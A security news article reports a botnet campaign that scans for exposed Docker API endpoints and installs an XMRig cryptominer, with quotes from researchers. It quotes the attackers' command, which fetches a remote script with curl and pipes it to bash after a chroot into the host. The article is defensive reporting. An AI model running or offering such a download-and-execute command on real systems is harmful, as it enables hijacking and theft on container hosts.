HomeSecurityHackers install cryprominer on Docker platforms with exposed API endpoints

Hackers install cryprominer on Docker platforms with exposed API endpoints

Docker platformsResearchers have discovered that a hacking group is massively scanning the internet looking for Docker platforms that have API endpoints exposed to the internet.

Hackers are conducting the scans with the aim of deploying a cryptominer on the exposed Docker platforms and stealing money.

Professionals behind the hacking campaign

According to researchers, the massive internet scanning campaign began over the weekend of November 24. It immediately caught the attention of researchers due to its vast scope.

Troy Mursch, lead researcher and co-founder of Bad Packets LLC, said that exploiting exposed Docker platforms is nothing new. It happens often.

“What made this campaign stand out was the large scope of the scan. That alone required further investigation to find out where this botnet,” he said.

What information do we have so far?

So far , researchers have discovered that the hacking group responsible for this campaign has already scanned more than 59,000 IP networks (netblocks) looking for exposed Docker platforms.

If a vulnerable machine is detected, hackers use the API endpoint to launch an Alpine Linux OS container, where they execute the following command:

chroot / mnt / bin / sh -c 'curl-sL4 https://ix.io/1XQa | bash?

This command downloads and executes a Bash script from the attackers’ server. This script then installs an XMRRig cryptominer. According to Mursch, over the weekend, the hackers stole 14.82 Monero (XMR) coins, worth just under $740.

Hackers install cryprominer on Docker platforms with exposed API endpoints

Another thing the researchers noticed is that the malware installed by hackers has a self-defense measure.

“A unique but interesting feature of this campaign is that it uninstalls known tracking programs and kills various processes, via a script downloaded from http://ix[.]io/1XQh,” Mursch said.

This script disables products security, as well as processes, associated with rival cryptomining botnets, such as DDG.

Additionally, Mursch discovered that the malicious script has another function, which scans the infected computer for rConfig configuration files. The script encrypts and steals the files and sends them to the attackers' command and control server.

Craig H. Rowland, founder of Sandfly Security, also observed that hackers create backdoor accounts in hacked containers and leave behind SSH keys so they can have easier access and remotely control all infected bots.

For now, Mursch recommends that all users and companies running Docker platforms check for exposed API endpoints on the internet and take immediate action.

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

Absentee Mia
Absentee Miahttps://www.secnews.gr/politiki-syntaxis/
Member of the Editorial Team of SecNews. He writes about cybersecurity, online fraud, privacy and technology. All articles follow the SecNews Editorial Policy.

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS